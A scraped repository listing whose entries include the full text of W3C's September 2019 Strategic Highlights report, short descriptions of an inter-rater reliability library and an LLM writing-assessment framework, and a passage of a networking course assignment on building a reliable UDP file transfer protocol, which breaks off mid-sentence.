23 skills found
jettbrains / L W3C Strategic Highlights September 2019 This report was prepared for the September 2019 W3C Advisory Committee Meeting (W3C Member link). See the accompanying W3C Fact Sheet — September 2019. For the previous edition, see the April 2019 W3C Strategic Highlights. For future editions of this report, please consult the latest version. A Chinese translation is available. ☰ Contents Introduction Future Web Standards Meeting Industry Needs Web Payments Digital Publishing Media and Entertainment Web & Telecommunications Real-Time Communications (WebRTC) Web & Networks Automotive Web of Things Strengthening the Core of the Web HTML CSS Fonts SVG Audio Performance Web Performance WebAssembly Testing Browser Testing and Tools WebPlatform Tests Web of Data Web for All Security, Privacy, Identity Internationalization (i18n) Web Accessibility Outreach to the world W3C Developer Relations W3C Training Translations W3C Liaisons Introduction This report highlights recent work of enhancement of the existing landscape of the Web platform and innovation for the growth and strength of the Web. 33 working groups and a dozen interest groups enable W3C to pursue its mission through the creation of Web standards, guidelines, and supporting materials. We track the tremendous work done across the Consortium through homogeneous work-spaces in Github which enables better monitoring and management. We are in the middle of a period where we are chartering numerous working groups which demonstrate the rapid degree of change for the Web platform: After 4 years, we are nearly ready to publish a Payment Request API Proposed Recommendation and we need to soon charter follow-on work. In the last year we chartered the Web Payment Security Interest Group. In the last year we chartered the Web Media Working Group with 7 specifications for next generation Media support on the Web. We have Accessibility Guidelines under W3C Member review which includes Silver, a new approach. We have just launched the Decentralized Identifier Working Group which has tremendous potential because Decentralized Identifier (DID) is an identifier that is globally unique, resolveable with high availability, and cryptographically verifiable. We have Privacy IG (PING) under W3C Member review which strengthens our focus on the tradeoff between privacy and function. We have a new CSS charter under W3C Member review which maps the group's work for the next three years. In this period, W3C and the WHATWG have succesfully completed the negotiation of a Memorandum of Understanding rooted in the mutual belief that that having two distinct specifications claiming to be normative is generally harmful for the Web community. The MOU, signed last May, describes how the two organizations are to collaborate on the development of a single authoritative version of the HTML and DOM specifications. W3C subsequently rechartered the HTML Working Group to assist the W3C community in raising issues and proposing solutions for the HTML and DOM specifications, and for the production of W3C Recommendations from WHATWG Review Drafts. As the Web evolves continuously, some groups are looking for ways for specifications to do so as well. So-called "evergreen recommendations" or "living standards" aim to track continuous development (and maintenance) of features, on a feature-by-feature basis, while getting review and patent commitments. We see the maturation and further development of an incredible number of new technologies coming to the Web. Continued progress in many areas demonstrates the vitality of the W3C and the Web community, as the rest of the report illustrates. Future Web Standards W3C has a variety of mechanisms for listening to what the community thinks could become good future Web standards. These include discussions with the Membership, discussions with other standards bodies, the activities of thousands of participants in over 300 community groups, and W3C Workshops. There are lots of good ideas. The W3C strategy team has been identifying promising topics and invites public participation. Future, recent and under consideration Workshops include: Inclusive XR (5-6 November 2019, Seattle, WA, USA) to explore existing and future approaches on making Virtual and Augmented Reality experiences more inclusive, including to people with disabilities; W3C Workshop on Data Models for Transportation (12-13 September 2019, Palo Alto, CA, USA) W3C Workshop on Web Games (27-28 June 2019, Redmond, WA, USA), view report Second W3C Workshop on the Web of Things (3-5 June 2019, Munich, Germany) W3C Workshop on Web Standardization for Graph Data; Creating Bridges: RDF, Property Graph and SQL (4-6 March 2019, Berlin, Germany), view report Web & Machine Learning. The Strategy Funnel documents the staff's exploration of potential new work at various phases: Exploration and Investigation, Incubation and Evaluation, and eventually to the chartering of a new standards group. The Funnel view is a GitHub Project where new area are issues represented by “cards” which move through the columns, usually from left to right. Most cards start in Exploration and move towards Chartering, or move out of the funnel. Public input is welcome at any stage but particularly once Incubation has begun. This helps W3C identify work that is sufficiently incubated to warrant standardization, to review the ecosystem around the work and indicate interest in participating in its standardization, and then to draft a charter that reflects an appropriate scope. Ongoing feedback can speed up the overall standardization process. Since the previous highlights document, W3C has chartered a number of groups, and started discussion on many more: Newly Chartered or Rechartered Web Application Security WG (03-Apr) Web Payment Security IG (17-Apr) Patent and Standards IG (24-Apr) Web Applications WG (14-May) Web & Networks IG (16-May) Media WG (23-May) Media and Entertainment IG (06-Jun) HTML WG (06-Jun) Decentralized Identifier WG (05-Sep) Extended Privacy IG (PING) (30-Sep) Verifiable Claims WG (30-Sep) Service Workers WG (31-Dec) Dataset Exchange WG (31-Dec) Web of Things Working Group (31-Dec) Web Audio Working Group (31-Dec) Proposed charters / Advance Notice Accessibility Guidelines WG Privacy IG (PING) RDF Literal Direction WG Timed Text WG CSS WG Web Authentication WG Closed Internationalization Tag Set IG Meeting Industry Needs Web Payments All Web Payments specifications W3C's payments standards enable a streamlined checkout experience, enabling a consistent user experience across the Web with lower front end development costs for merchants. Users can store and reuse information and more quickly and accurately complete online transactions. The Web Payments Working Group has republished Payment Request API as a Candidate Recommendation, aiming to publish a Proposed Recommendation in the Fall 2019, and is discussing use cases and features for Payment Request after publication of the 1.0 Recommendation. Browser vendors have been finalizing implementation of features added in the past year (view the implementation report). As work continues on the Payment Handler API and its implementation (currently in Chrome and Edge Canary), one focus in 2019 is to increase adoption in other browsers. Recently, Mastercard demonstrated the use of Payment Request API to carry out EMVCo's Secure Remote Commerce (SRC) protocol whose payment method definition is being developed with active participation by Visa, Mastercard, American Express, and Discover. Payment method availability is a key factor in merchant considerations about adopting Payment Request API. The ability to get uniform adoption of a new payment method such as Secure Remote Commerce (SRC) also depends on the availability of the Payment Handler API in browsers, or of proprietary alternatives. Web Monetization, which the Web Payments Working Group will discuss again at its face-to-face meeting in September, can be used to enable micropayments as an alternative revenue stream to advertising. Since the beginning of 2019, Amazon, Brave Software, JCB, Certus Cybersecurity Solutions and Netflix have joined the Web Payments Working Group. In April, W3C launched the Web Payment Security Group to enable W3C, EMVCo, and the FIDO Alliance to collaborate on a vision for Web payment security and interoperability. Participants will define areas of collaboration and identify gaps between existing technical specifications in order to increase compatibility among different technologies, such as: How do SRC, FIDO, and Payment Request relate? The Payment Services Directive 2 (PSD2) regulations in Europe are scheduled to take effect in September 2019. What is the role of EMVCo, W3C, and FIDO technologies, and what is the current state of readiness for the deadline? How can we improve privacy on the Web at the same time as we meet industry requirements regarding user identity? Digital Publishing All Digital Publishing specifications, Publication milestones The Web is the universal publishing platform. Publishing is increasingly impacted by the Web, and the Web increasingly impacts Publishing. Topic of particular interest to Publishing@W3C include typography and layout, accessibility, usability, portability, distribution, archiving, offline access, print on demand, and reliable cross referencing. And the diverse publishing community represented in the groups consist of the traditional "trade" publishers, ebook reading system manufacturers, but also publishers of audio book, scholarly journals or educational materials, library scientists or browser developers. The Publishing Working Group currently concentrates on Audiobooks which lack a comprehensive standard, thus incurring extra costs and time to publish in this booming market. Active development is ongoing on the future standard: Publication Manifest Audiobook profile for Web Publications Lightweight Packaging Format The BD Comics Manga Community Group, the Synchronized Multimedia for Publications Community Group, the Publishing Community Group and a future group on archival, are companions to the working group where specific work is developed and incubated. The Publishing Community Group is a recently launched incubation channel for Publishing@W3C. The goal of the group is to propose, document, and prototype features broadly related to: publications on the Web reading modes and systems and the user experience of publications The EPUB 3 Community Group has successfully completed the revision of EPUB 3.2. The Publishing Business Group fosters ongoing participation by members of the publishing industry and the overall ecosystem in the development of Web infrastructure to better support the needs of the industry. The Business Group serves as an additional conduit to the Publishing Working Group and several Community Groups for feedback between the publishing ecosystem and W3C. The Publishing BG has played a vital role in fostering and advancing the adoption and continued development of EPUB 3. In particular the BG provided critical support to the update of EPUBCheck to validate EPUB content to the new EPUB 3.2 specification. This resulted in the development, in conjunction with the EPUB3 Community Group, of a new generation of EPUBCheck, i.e., EPUBCheck 4.2 production-ready release. Media and Entertainment All Media specifications The Media and Entertainment vertical tracks media-related topics and features that create immersive experiences for end users. HTML5 brought standard audio and video elements to the Web. Standardization activities since then have aimed at turning the Web into a professional platform fully suitable for the delivery of media content and associated materials, enabling missing features to stream video content on the Web such as adaptive streaming and content protection. Together with Microsoft, Comcast, Netflix and Google, W3C received an Technology & Engineering Emmy Award in April 2019 for standardization of a full TV experience on the Web. Current goals are to: Reinforce core media technologies: Creation of the Media Working Group, to develop media-related specifications incubated in the WICG (e.g. Media Capabilities, Picture-in-picture, Media Session) and maintain maintain/evolve Media Source Extensions (MSE) and Encrypted Media Extensions (EME). Improve support for Media Timed Events: data cues incubation. Enhance color support (HDR, wide gamut), in scope of the CSS WG and in the Color on the Web CG. Reduce fragmentation: Continue annual releases of a common and testable baseline media devices, in scope of the Web Media APIs CG and in collaboration with the CTA WAVE Project. Maintain the Road-map of Media Technologies for the Web which highlights Web technologies that can be used to build media applications and services, as well as known gaps to enable additional use cases. Create the future: Discuss perspectives for Media and Entertainment for the Web. Bring the power of GPUs to the Web (graphics, machine learning, heavy processing), under incubation in the GPU for the Web CG. Transition to a Working Group is under discussion. Determine next steps after the successful W3C Workshop on Web Games of June 2019. View the report. Timed Text The Timed Text Working Group develops and maintains formats used for the representation of text synchronized with other timed media, like audio and video, and notably works on TTML, profiles of TTML, and WebVTT. Recent progress includes: A robust WebVTT implementation report poises the specification for publication as a proposed recommendation. Discussions around re-chartering, notably to add a TTML Profile for Audio Description deliverable to the scope of the group, and clarify that rendering of captions within XR content is also in scope. Immersive Web Hardware that enables Virtual Reality (VR) and Augmented Reality (AR) applications are now broadly available to consumers, offering an immersive computing platform with both new opportunities and challenges. The ability to interact directly with immersive hardware is critical to ensuring that the web is well equipped to operate as a first-class citizen in this environment. The Immersive Web Working Group has been stabilizing the WebXR Device API while the companion Immersive Web Community Group incubates the next series of features identified as key for the future of the Immersive Web. W3C plans a workshop focused on the needs and benefits at the intersection of VR & Accessibility (Inclusive XR), on 5-6 November 2019 in Seattle, WA, USA, to explore existing and future approaches on making Virtual and Augmented Reality experiences more inclusive. Web & Telecommunications The Web is the Open Platform for Mobile. Telecommunication service providers and network equipment providers have long been critical actors in the deployment of Web technologies. As the Web platform matures, it brings richer and richer capabilities to extend existing services to new users and devices, and propose new and innovative services. Real-Time Communications (WebRTC) All Real-Time Communications specifications WebRTC has reshaped the whole communication landscape by making any connected device a potential communication end-point, bringing audio and video communications anywhere, on any network, vastly expanding the ability of operators to reach their customers. WebRTC serves as the corner-stone of many online communication and collaboration services. The WebRTC Working Group aims to bringing WebRTC 1.0 (and companion specification Media Capture and Streams) to Recommendation by the end of 2019. Intense efforts are focused on testing (supported by a dedicated hackathon at IETF 104) and interoperability. The group is considering pushing features that have not gotten enough traction to separate modules or to a later minor revision of the spec. Beyond WebRTC 1.0, the WebRTC Working Group will focus its efforts on WebRTC NV which the group has started documenting by identifying use cases. Web & Networks Recently launched, in the wake of the May 2018 Web5G workshop, the Web & Networks Interest Group is chaired by representatives from AT&T, China Mobile and Intel, with a goal to explore solutions for web applications to achieve better performance and resource allocation, both on the device and network. The group's first efforts are around use cases, privacy & security requirements and liaisons. Automotive All Automotive specifications To create a rich application ecosystem for vehicles and other devices allowed to connect to the vehicle, the W3C Automotive Working Group is delivering a service specification to expose all common vehicle signals (engine temperature, fuel/charge level, range, tire pressure, speed, etc.) The Vehicle Information Service Specification (VISS), which is a Candidate Recommendation, is seeing more implementations across the industry. It provides the access method to a common data model for all the vehicle signals –presently encapsulating a thousand or so different data elements– and will be growing to accommodate the advances in automotive such as autonomous and driver assist technologies and electrification. The group is already working on a successor to VISS, leveraging the underlying data model and the VIWI submission from Volkswagen, for a more robust means of accessing vehicle signals information and the same paradigm for other automotive needs including location-based services, media, notifications and caching content. The Automotive and Web Platform Business Group acts as an incubator for prospective standards work. One of its task forces is using W3C VISS in performing data sampling and off-boarding the information to the cloud. Access to the wealth of information that W3C's auto signals standard exposes is of interest to regulators, urban planners, insurance companies, auto manufacturers, fleet managers and owners, service providers and others. In addition to components needed for data sampling and edge computing, capturing user and owner consent, information collection methods and handling of data are in scope. The upcoming W3C Workshop on Data Models for Transportation (September 2019) is expected to focus on the need of additional ontologies around transportation space. Web of Things All Web of Things specifications W3C's Web of Things work is designed to bridge disparate technology stacks to allow devices to work together and achieve scale, thus enabling the potential of the Internet of Things by eliminating fragmentation and fostering interoperability. Thing descriptions expressed in JSON-LD cover the behavior, interaction affordances, data schema, security configuration, and protocol bindings. The Web of Things complements existing IoT ecosystems to reduce the cost and risk for suppliers and consumers of applications that create value by combining multiple devices and information services. There are many sectors that will benefit, e.g. smart homes, smart cities, smart industry, smart agriculture, smart healthcare and many more. The Web of Things Working Group is finishing the initial Web of Things standards, with support from the Web of Things Interest Group: Web of Things Architecture Thing Descriptions Strengthening the Core of the Web HTML The HTML Working Group was chartered early June to assist the W3C community in raising issues and proposing solutions for the HTML and DOM specifications, and to produce W3C Recommendations from WHATWG Review Drafts. A few days before, W3C and the WHATWG signed a Memorandum of Understanding outlining the agreement to collaborate on the development of a single version of the HTML and DOM specifications. Issues and proposed solutions for HTML and DOM done via the newly rechartered HTML Working Group in the WHATWG repositories The HTML Working Group is targetting November 2019 to bring HTML and DOM to Candidate Recommendations. CSS All CSS specifications CSS is a critical part of the Open Web Platform. The CSS Working Group gathers requirements from two large groups of CSS users: the publishing industry and application developers. Within W3C, those groups are exemplified by the Publishing groups and the Web Platform Working Group. The former requires things like better pagination support and advanced font handling, the latter needs intelligent (and fast!) scrolling and animations. What we know as CSS is actually a collection of almost a hundred specifications, referred to as ‘modules’. The current state of CSS is defined by a snapshot, updated once a year. The group also publishes an index defining every term defined by CSS specifications. Fonts All Fonts specifications The Web Fonts Working Group develops specifications that allow the interoperable deployment of downloadable fonts on the Web, with a focus on Progressive Font Enrichment as well as maintenance of WOFF Recommendations. Recent and ongoing work includes: Early API experiments by Adobe and Monotype have demonstrated the feasibility of a font enrichment API, where a server delivers a font with minimal glyph repertoire and the client can query the full repertoire and request additional subsets on-the-fly. In other experiments, the Brotli compression used in WOFF 2 was extended to support shared dictionaries and patch update. Metrics to quantify improvement are a current hot discussion topic. The group will meet at ATypi 2019 in Japan, to gather requirements from the international typography community. The group will first produce a report summarizing the strengths and weaknesses of each prototype solution by Q2 2020. SVG All SVG specifications SVG is an important and widely-used part of the Open Web Platform. The SVG Working Group focuses on aligning the SVG 2.0 specification with browser implementations, having split the specification into a currently-implemented 2.0 and a forward-looking 2.1. Current activity is on stabilization, increased integration with the Open Web Platform, and test coverage analysis. The Working Group was rechartered in March 2019. A new work item concerns native (non-Web-browser) uses of SVG as a non-interactive, vector graphics format. Audio The Web Audio Working Group was extended to finish its work on the Web Audio API, expecting to publish it as a Recommendation by year end. The specification enables synthesizing audio in the browser. Audio operations are performed with audio nodes, which are linked together to form a modular audio routing graph. Multiple sources — with different types of channel layout — are supported. This modular design provides the flexibility to create complex audio functions with dynamic effects. The first version of Web Audio API is now feature complete and is implemented in all modern browsers. Work has started on the next version, and new features are being incubated in the Audio Community Group. Performance Web Performance All Web Performance specifications There are currently 18 specifications in development in the Web Performance Working Group aiming to provide methods to observe and improve aspects of application performance of user agent features and APIs. The W3C team is looking at related work incubated in the W3C GPU for the Web (WebGPU) Community Group which is poised to transition to a W3C Working Group. A preliminary draft charter is available. WebAssembly All WebAssembly specifications WebAssembly improves Web performance and power by being a virtual machine and execution environment enabling loaded pages to run native (compiled) code. It is deployed in Firefox, Edge, Safari and Chrome. The specification will soon reach Candidate Recommendation. WebAssembly enables near-native performance, optimized load time, and perhaps most importantly, a compilation target for existing code bases. While it has a small number of native types, much of the performance increase relative to Javascript derives from its use of consistent typing. WebAssembly leverages decades of optimization for compiled languages and the byte code is optimized for compactness and streaming (the web page starts executing while the rest of the code downloads). Network and API access all occurs through accompanying Javascript libraries -- the security model is identical to that of Javascript. Requirements gathering and language development occur in the Community Group while the Working Group manages test development, community review and progression of specifications on the Recommendation Track. Testing Browser testing plays a critical role in the growth of the Web by: Improving the reliability of Web technology definitions; Improving the quality of implementations of these technologies by helping vendors to detect bugs in their products; Improving the data available to Web developers on known bugs and deficiencies of Web technologies by publishing results of these tests. Browser Testing and Tools The Browser Testing and Tools Working Group is developing WebDriver version 2, having published last year the W3C Recommendation of WebDriver. WebDriver acts as a remote control interface that enables introspection and control of user agents, provides a platform- and language-neutral wire protocol as a way for out-of-process programs to remotely instruct the behavior of Web, and emulates the actions of a real person using the browser. WebPlatform Tests The WebPlatform Tests project now provides a mechanism which allows to fully automate tests that previously needed to be run manually: TestDriver. TestDriver enables sending trusted key and mouse events, sending complex series of trusted pointer and key interactions for things like in-content drag-and-drop or pinch zoom, and even file upload. Since 2014 W3C began work on this coordinated open-source effort to build a cross-browser test suite for the Web Platform, which WHATWG, and all major browsers adopted. Web of Data All Data specifications There have been several great success stories around the standardization of data on the web over the past year. Verifiable Claims seems to have significant uptake. It is also significant that the Distributed Identifier WG charter has received numerous favorable reviews, and was just recently launched. JSON-LD has been a major success with the large deployment on Web sites via schema.org. JSON-LD 1.1 completed technical work, about to transition to CR More than 25% of websites today include schema.org data in JSON-LD The Web of Things description is in CR since May, making use of JSON-LD Verifiable Credentials data model is in CR since July, also making use of JSON-LD Continued strong interest in decentralized identifiers Engagement from the TAG with reframing core documents, such as Ethical Web Principles, to include data on the web within their scope Data is increasingly important for all organizations, especially with the rise of IoT and Big Data. W3C has a mature and extensive suite of standards relating to data that were developed over two decades of experience, with plans for further work on making it easier for developers to work with graph data and knowledge graphs. Linked Data is about the use of URIs as names for things, the ability to dereference these URIs to get further information and to include links to other data. There are ever-increasing sources of open Linked Data on the Web, as well as data services that are restricted to the suppliers and consumers of those services. The digital transformation of industry is seeking to exploit advanced digital technologies. This will facilitate businesses to integrate horizontally along the supply and value chains, and vertically from the factory floor to the office floor. W3C is seeking to make it easier to support enterprise-wide data management and governance, reflecting the strategic importance of data to modern businesses. Traditional approaches to data have focused on tabular databases (SQL/RDBMS), Comma Separated Value (CSV) files, and data embedded in PDF documents and spreadsheets. We're now in midst of a major shift to graph data with nodes and labeled directed links between them. Graph data is: Faster than using SQL and associated JOIN operations More favorable to integrating data from heterogeneous sources Better suited to situations where the data model is evolving In the wake of the recent W3C Workshop on Graph Data we are in the process of launching a Graph Standardization Business Group to provide a business perspective with use cases and requirements, to coordinate technical standards work and liaisons with external organizations. Web for All Security, Privacy, Identity All Security specifications, all Privacy specifications Authentication on the Web As the WebAuthn Level 1 W3C Recommendation published last March is seeing wide implementation and adoption of strong cryptographic authentication, work is proceeding on Level 2. The open standard Web API gives native authentication technology built into native platforms, browsers, operating systems (including mobile) and hardware, offering protection against hacking, credential theft, phishing attacks, thus aiming to end the era of passwords as a security construct. You may read more in our March press release. Privacy An increasing number of W3C specifications are benefitting from Privacy and Security review; there are security and privacy aspects to every specification. Early review is essential. Working with the TAG, the Privacy Interest Group has updated the Self-Review Questionnaire: Security and Privacy. Other recent work of the group includes public blogging further to the exploration of anti-patterns in standards and permission prompts. Security The Web Application Security Working Group adopted Feature Policy, aiming to allow developers to selectively enable, disable, or modify the behavior of some of these browser features and APIs within their application; and Fetch Metadata, aiming to provide servers with enough information to make a priori decisions about whether or not to service a request based on the way it was made, and the context in which it will be used. The Web Payment Security Interest Group, launched last April, convenes members from W3C, EMVCo, and the FIDO Alliance to discuss cooperative work to enhance the security and interoperability of Web payments (read more about payments). Internationalization (i18n) All Internationalization specifications, educational articles related to Internationalization, spec developers checklist Only a quarter or so current Web users use English online and that proportion will continue to decrease as the Web reaches more and more communities of limited English proficiency. If the Web is to live up to the "World Wide" portion of its name, and for the Web to truly work for stakeholders all around the world engaging with content in various languages, it must support the needs of worldwide users as they engage with content in the various languages. The growth of epublishing also brings requirements for new features and improved typography on the Web. It is important to ensure the needs of local communities are captured. The W3C Internationalization Initiative was set up to increase in-house resources dedicated to accelerating progress in making the World Wide Web "worldwide" by gathering user requirements, supporting developers, and education & outreach. For an overview of current projects see the i18n radar. W3C's Internationalization efforts progressed on a number of fronts recently: Requirements: New African and European language groups will work on the gap analysis, errata and layout requirements. Gap analysis: Japanese, Devanagari, Bengali, Tamil, Lao, Khmer, Javanese, and Ethiopic updated in the gap-analysis documents. Layout requirements document: notable progress tracked in the Southeast Asian Task Force while work continues on Chinese layout requirements. Developer support: Spec reviews: the i18n WG continues active review of specifications of the WHATWG and other W3C Working Groups. Short review checklist: easy way to begin a self-review to help spec developers understand what aspects of their spec are likely to need attention for internationalization, and points them to more detailed checklists for the relevant topics. It also helps those reviewing specs for i18n issues. Strings on the Web: Language and Direction Metadata lays out issues and discusses potential solutions for passing information about language and direction with strings in JSON or other data formats. The document was rewritten for clarity, and expanded. The group is collaborating with the JSON-LD and Web Publishing groups to develop a plan for updating RDF, JSON-LD and related specifications to handle metadata for base direction of text (bidi). User-friendly test format: a new format was developed for Internationalization Test Suite tests, which displays helpful information about how the test works. This particularly useful because those tests are pointed to by educational materials and gap-analysis documents. Web Platform Tests: a large number of tests in the i18n test suite have been ported to the WPT repository, including: css-counter-styles, css-ruby, css-syntax, css-test, css-text-decor, css-writing-modes, and css-pseudo. Education & outreach: (for all educational materials, see the HTML & CSS Authoring Techniques) Web Accessibility All Accessibility specifications, WAI resources The Web Accessibility Initiative supports W3C's Web for All mission. Recent achievements include: Education and training: Inaccessibility of CAPTCHA updated to bring our analysis and recommendations up to date with CAPTCHA practice today, concluding two years of extensive work and invaluable input from the public (read more on the W3C Blog Learn why your web content and applications should be accessible. The Education and Outreach Working Group has completed revision and updating of the Business Case for Digital Accessibility. Accessibility guidelines: The Accessibility Guidelines Working Group has continued to update WCAG Techniques and Understanding WCAG 2.1; and published a Candidate Recommendation of Accessibility Conformance Testing Rules Format 1.0 to improve inter-rater reliability when evaluating conformance of web content to WCAG An updated charter is being developed to host work on "Silver", the next generation accessibility guidelines (WCAG 2.2) There are accessibility aspects to most specifications. Check your work with the FAST checklist. Outreach to the world W3C Developer Relations To foster the excellent feedback loop between Web Standards development and Web developers, and to grow participation from that diverse community, recent W3C Developer Relations activities include: @w3cdevs tracks the enormous amount of work happening across W3C W3C Track during the Web Conference 2019 in San Francisco Tech videos: W3C published the 2019 Web Games Workshop videos The 16 September 2019 Developer Meetup in Fukuoka, Japan, is open to all and will combine a set of technical demos prepared by W3C groups, and a series of talks on a selected set of W3C technologies and projects W3C is involved with Mozilla, Google, Samsung, Microsoft and Bocoup in the organization of ViewSource 2019 in Amsterdam (read more on the W3C Blog) W3C Training In partnership with EdX, W3C's MOOC training program, W3Cx offers a complete "Front-End Web Developer" (FEWD) professional certificate program that consists of a suite of five courses on the foundational languages that power the Web: HTML5, CSS and JavaScript. We count nearly 900K students from all over the world. Translations Many Web users rely on translations of documents developed at W3C whose official language is English. W3C is extremely grateful to the continuous efforts of its community in ensuring our various deliverables in general, and in our specifications in particular, are made available in other languages, for free, ensuring their exposure to a much more diverse set of readers. Last Spring we developed a more robust system, a new listing of translations of W3C specifications and updated the instructions on how to contribute to our translation efforts. W3C Liaisons Liaisons and coordination with numerous organizations and Standards Development Organizations (SDOs) is crucial for W3C to: make sure standards are interoperable coordinate our respective agenda in Internet governance: W3C participates in ICANN, GIPO, IGF, the I* organizations (ICANN, IETF, ISOC, IAB). ensure at the government liaison level that our standards work is officially recognized when important to our membership so that products based on them (often done by our members) are part of procurement orders. W3C has ARO/PAS status with ISO. W3C participates in the EU MSP and Rolling Plan on Standardization ensure the global set of Web and Internet standards form a compatible stack of technologies, at the technical and policy level (patent regime, fragmentation, use in policy making) promote Standards adoption equally by the industry, the public sector, and the public at large Coralie Mercier, Editor, W3C Marketing & Communications $Id: Overview.html,v 1.60 2019/10/15 12:05:52 coralie Exp $ Copyright © 2019 W3C ® (MIT, ERCIM, Keio, Beihang) Usage policies apply.
grrrr / Krippendorff AlphaPython implementation of Krippendorff's alpha -- inter-rater reliability
John-Wang-0809 / LLM Writing Assessment Psychometric FrameworkA repository for evaluating large language models as raters in large-scale writing assessments, focusing on a psychometric framework for reliability and validity.
SOYJUN / FTP Implement Based On UDPThe aim of this assignment is to have you do UDP socket client / server programming with a focus on two broad aspects : Setting up the exchange between the client and server in a secure way despite the lack of a formal connection (as in TCP) between the two, so that ‘outsider’ UDP datagrams (broadcast, multicast, unicast - fortuitously or maliciously) cannot intrude on the communication. Introducing application-layer protocol data-transmission reliability, flow control and congestion control in the client and server using TCP-like ARQ sliding window mechanisms. The second item above is much more of a challenge to implement than the first, though neither is particularly trivial. But they are not tightly interdependent; each can be worked on separately at first and then integrated together at a later stage. Apart from the material in Chapters 8, 14 & 22 (especially Sections 22.5 - 22.7), and the experience you gained from the preceding assignment, you will also need to refer to the following : ioctl function (Chapter 17). get_ifi_info function (Section 17.6, Chapter 17). This function will be used by the server code to discover its node’s network interfaces so that it can bind all its interface IP addresses (see Section 22.6). ‘Race’ conditions (Section 20.5, Chapter 20) You also need a thorough understanding of how the TCP protocol implements reliable data transfer, flow control and congestion control. Chapters 17- 24 of TCP/IP Illustrated, Volume 1 by W. Richard Stevens gives a good overview of TCP. Though somewhat dated for some things (it was published in 1994), it remains, overall, a good basic reference. Overview This assignment asks you to implement a primitive file transfer protocol for Unix platforms, based on UDP, and with TCP-like reliability added to the transfer operation using timeouts and sliding-window mechanisms, and implementing flow and congestion control. The server is a concurrent server which can handle multiple clients simultaneously. A client gives the server the name of a file. The server forks off a child which reads directly from the file and transfers the contents over to the client using UDP datagrams. The client prints out the file contents as they come in, in order, with nothing missing and with no duplication of content, directly on to stdout (via the receiver sliding window, of course, but with no other intermediate buffering). The file to be transferred can be of arbitrary length, but its contents are always straightforward ascii text. As an aside let me mention that assuming the file contents ascii is not as restrictive as it sounds. We can always pretend, for example, that binary files are base64 encoded (“ASCII armor”). A real file transfer protocol would, of course, have to worry about transferring files between heterogeneous platforms with different file structure conventions and semantics. The sender would first have to transform the file into a platform-independent, protocol-defined, format (using, say, ASN.1, or some such standard), and the receiver would have to transform the received file into its platform’s native file format. This kind of thing can be fairly time consuming, and is certainly very tedious, to implement, with little educational value - it is not part of this assignment. Arguments for the server You should provide the server with an input file server.in from which it reads the following information, in the order shown, one item per line : Well-known port number for server. Maximum sending sliding-window size (in datagram units). You will not be handing in your server.in file. We shall create our own when we come to test your code. So it is important that you stick strictly to the file name and content conventions specified above. The same applies to the client.in input file below. Arguments for the client The client is to be provided with an input file client.in from which it reads the following information, in the order shown, one item per line : IP address of server (not the hostname). Well-known port number of server. filename to be transferred. Receiving sliding-window size (in datagram units). Random generator seed value. Probability p of datagram loss. This should be a real number in the range [ 0.0 , 1.0 ] (value 0.0 means no loss occurs; value 1.0 means all datagrams all lost). The mean µ, in milliseconds, for an exponential distribution controlling the rate at which the client reads received datagram payloads from its receive buffer. Operation Server starts up and reads its arguments from file server.in. As we shall see, when a client communicates with the server, the server will want to know what IP address that client is using to identify the server (i.e. , the destination IP address in the incoming datagram). Normally, this can be done relatively straightforwardly using the IP_RECVDESTADDR socket option, and picking up the information using the ancillary data (‘control information’) capability of the recvmsg function. Unfortunately, Solaris 2.10 does not support the IP_RECVDESTADDR option (nor, incidentally, does it support the msg_flags option in msghdr - see p.390). This considerably complicates things. In the absence of IP_RECVDESTADDR, what the server has to do as part of its initialization phase is to bind each IP address it has (and, simultaneously, its well-known port number, which it has read in from server.in) to a separate UDP socket. The code in Section 22.6, which uses the get_ifi_info function, shows you how to do that. However, there are important differences between that code and the version you want to implement. The code of Section 22.6 binds the IP addresses and forks off a child for each address that is bound to. We do not want to do that. Instead you should have an array of socket descriptors. For each IP address, create a new socket and bind the address (and well-known port number) to the socket without forking off child processes. Creating child processes comes later, when clients arrive. The code of Section 22.6 also attempts to bind broadcast addresses. We do not want to do this. It binds a wildcard IP address, which we certainly do not want to do either. We should bind strictly only unicast addresses (including the loopback address). The get_ifi_info function (which the code in Section 22.6 uses) has to be modified so that it also gets the network masks for the IP addresses of the node, and adds these to the information stored in the linked list of ifi_info structures (see Figure 17.5, p.471) it produces. As you go binding each IP address to a distinct socket, it will be useful for later processing to build your own array of structures, where a structure element records the following information for each socket : sockfd IP address bound to the socket network mask for the IP address subnet address (obtained by doing a bit-wise and between the IP address and its network mask) Report, in a ReadMe file which you hand in with your code, on the modifications you had to introduce to ensure that only unicast addresses are bound, and on your implementation of the array of structures described above. You should print out on stdout, with an appropriate message and appropriately formatted in dotted decimal notation, the IP address, network mask, and subnet address for each socket in your array of structures (you do not need to print the sockfd). The server now uses select to monitor the sockets it has created for incoming datagrams. When it returns from select, it must use recvfrom or recvmsg to read the incoming datagram (see 6. below). When a client starts, it first reads its arguments from the file client.in. The client checks if the server host is ‘local’ to its (extended) Ethernet. If so, all its communication to the server is to occur as MSG_DONTROUTE (or SO_DONTROUTE socket option). It determines if the server host is ‘local’ as follows. The first thing the client should do is to use the modified get_ifi_info function to obtain all of its IP addresses and associated network masks. Print out on stdout, in dotted decimal notation and with an appropriate message, the IP addresses and network masks obtained. In the following, IPserver designates the IP address the client will use to identify the server, and IPclient designates the IP address the client will choose to identify itself. The client checks whether the server is on the same host. If so, it should use the loopback address 127.0.0.1 for the server (i.e. , IPserver = 127.0.0.1). IPclient should also be set to the loopback address. Otherwise it proceeds as follows: IPserver is set to the IP address for the server in the client.in file. Given IPserver and the (unicast) IP addresses and network masks for the client returned by get_ifi_info in the linked list of ifi_info structures, you should be able to figure out if the server node is ‘local’ or not. This will be discussed in class; but let me just remind you here that you should use ‘longest prefix matching’ where applicable. If there are multiple client addresses, and the server host is ‘local’, the client chooses an IP address for itself, IPclient, which matches up as ‘local’ according to your examination above. If the server host is not ‘local’, then IPclient can be chosen arbitrarily. Print out on stdout the results of your examination, as to whether the server host is ‘local’ or not, as well as the IPclient and IPserver addresses selected. Note that this manner of determining whether the server is local or not is somewhat clumsy and ‘over-engineered’, and, as such, should be viewed more in the nature of a pedagogical exercise. Ideally, we would like to look up the server IP address(es) in the routing table (see Section 18.3). This requires that a routing socket be created, for which we need superuser privilege. Alternatively, we might want to dump out the routing table, using the sysctl function for example (see Section 18.4), and examine it directly. Unfortunately, Solaris 2.10 does not support sysctl. Furthermore, note that there is a slight problem with the address 130.245.1.123/24 assigned to compserv3 (see rightmost column of file hosts, and note that this particular compserv3 address “overlaps” with the 130.245.1.x/28 addresses in that same column assigned to compserv1, compserv2 & comserv4). In particular, 